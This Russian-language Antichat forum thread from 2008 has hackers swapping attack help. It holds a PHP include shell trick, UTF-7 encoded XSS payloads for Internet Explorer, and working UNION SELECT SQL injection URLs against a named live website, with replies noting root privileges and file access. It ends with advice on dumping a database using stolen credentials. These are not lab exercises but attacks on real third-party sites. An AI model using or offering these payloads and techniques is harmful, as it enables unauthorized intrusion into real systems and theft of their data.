ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.07.2008, 01:02
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Бармалей
есть следующая страничка
Код:
<?
$query="select * from spisok_users where user_name='$login' and password='$password'";
$result=mysql_query($query, $db);
$row=mysql_num_rows($result);?>
так вот можно ли как то изменить ее чтобы сделать из php-инъекцию?
пробывал
?password='%22;echo%22ghbdtn%22;exit;
или такое вообще не возможно? ыы. Вот, я переделал! :d
PHP код:
<?php
if (!empty($_GET['bla'])){include($_GET['bla']);}
else {echo "не взломал=\";}
?>
script.php?bla=shell.txt
И станешь ты взломщиком скриптов!
|
|
|
Xss-нападения с использованием кодировки Utf-7. |
03.07.2008, 13:51
|
|
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583
Репутация:
210
|
|
Xss-нападения с использованием кодировки Utf-7.
XSS-нападения с использованием кодировки UTF-7.
Есть сайт _http://www.softsoft.ru/search/609468/index.htm
Там есть форма поиска
Смотрим условия:
+ Работает только с браузером Internet Explorer
+ Код должен находится до тегов определяющих кодировку
+ Перед кодом не должно быть никакого текста, содержащего символы из других кодировок
Если в тег <title> поместить код в кодировке UTF-7 то браузер раскодирует его и выполнит.
То что мы ищем заноситься в тайтл
Поэтому по идее достаточно поместить вредоносный код в кодировке UTF-7 в форму поиска
На этом сайте фильтруеться строка, если она больше 3 символов, так что возможно не прокатит
Но вопросы:
1) Но я и на локалхосте пробую без фильтрации например так
<html>
<head></head>
<body>
+ADwA-script+AD4A-alert('hacked+ACEA-')+ADwA-/script+AD4A-
</body>
</html>
Алерта нет...
Как именно нужно указать что текст в кодировке UTF-7?
Переводил редактором AnyCode, а дальше просто скопировать полученный текст?
Или ИЕ уже по другому обрабатыает кодировки?
2) Есль ли такие же способы, но с другими кодировками
напр UTF-16 ?
|
|
|
|
03.07.2008, 13:56
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
чтобы код выполнялся, нужно поместить МЕТА-тег
Помню даж на старом античате статья была...
кстати вот она:
http://old.antichat.ru/txt/utf7/
прочти и всё поймёшь
|
|
|
|
03.07.2008, 14:04
|
|
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583
Репутация:
210
|
|
чтобы код выполнялся, нужно поместить МЕТА-тег
Помню даж на старом античате статья была...
кстати вот она:
http://old.antichat.ru/txt/utf7/
прочти и всё поймёшь
Ты бы сам-то прочитал бы эту статью!
Следует отметить, что распознавание кодировки, парсинг HTML тегов, и выполнение встретившихся скриптов происходит одновременно. Таким образом, если кодировка еще не определена, и встречается скрипт, зашифрованный в некоторой кодировке, например UTF-7, то браузер считает, что кодировка документа UTF-7, расшифровывает и выполняет скрипт, и только затем парсит оставшуюся часть документа. При этом, даже если впоследствии окажется, что кодировка иная (например встретился метатег с явным указанием кодировки, или были обнаружены русские буквы), скрипт все равно выполнится
Где там в примерах помещается МЕТА-тег???
Там просто закрываеться </title> - под видом +ADw-/title+AD4 и вставляеться javascript код
Но вопросы:
1) Но я и на локалхосте пробую без фильтрации например так
Цитата:
<html>
<head></head>
<body>
+ADwA-script+AD4A-alert('hacked+ACEA-')+ADwA-/script+AD4A-
</body>
</html>
Алерта нет...
Я смотрел заголовки - никакой передачи значения кодировки в HTTP Content-Type
Как именно нужно указать что текст в кодировке UTF-7?
Переводил редактором AnyCode, а дальше просто скопировать полученный текст?
Или ИЕ уже по другому обрабатыает кодировки?
2) Есль ли такие же способы, но с другими кодировками
напр UTF-16 ?
Последний раз редактировалось Naydav; 03.07.2008 в 14:17..
|
|
|
|
03.07.2008, 15:32
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
упс)) давно уже её читал, толком не помню, но суть прежняя : без мета тега не прокатит.
наверное только в старой ИЕшке.
|
|
|
|
03.07.2008, 16:05
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
и у меня возник вопрос, по скулям:
есть скуля, но выводятся только цифры, а текст не ввыводится. Что делать?
как пример, сайт русских шлюх:
http://putana.nu/list.php?link=-1+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43/*
|
|
|
|
03.07.2008, 16:09
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 o3,14um
нужны текстовые поля, всё выводится:
http://putana.nu/list.php?link=-1+union+select+1,user(),version(),4,5,6,7,8,9,10,1 1,12,13,%2014,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30%20,31,32,33,34,35,36,37,38,39,40,41,42 ,43/*
PS кстати root  |
|
|
|
03.07.2008, 16:42
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Скуля вообще может претендовать на звание идеальной, не смотря на 4.0 ветку.
File_priv = Y, к тому же еще и ось фряшная, значит можно диры просматривать.. развлечение да и только
Код:
cmd> POST /list.php?link=-1+union+select+1,@@version_compile_os,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+mysql.user/* HTTP/1.0
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
03.07.2008, 20:26
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Имею на руках логин, базу данных, пароль от базы данных.
Можно ли подсоединиться telnet'om или с помощью ssh к открытому порту 3306 и слить оттуда базу данных?
|
|
|
|
03.07.2008, 20:37
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514
Репутация:
3313
|
|
Сообщение от Ershik
Имею на руках логин, базу данных, пароль от базы данных.
Можно ли подсоединиться telnet'om или с помощью ssh к открытому порту 3306 и слить оттуда базу данных?
Да, а лучше найди на сайте phpmyadmin(если есть) или воспользуйся клиентом MySql
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид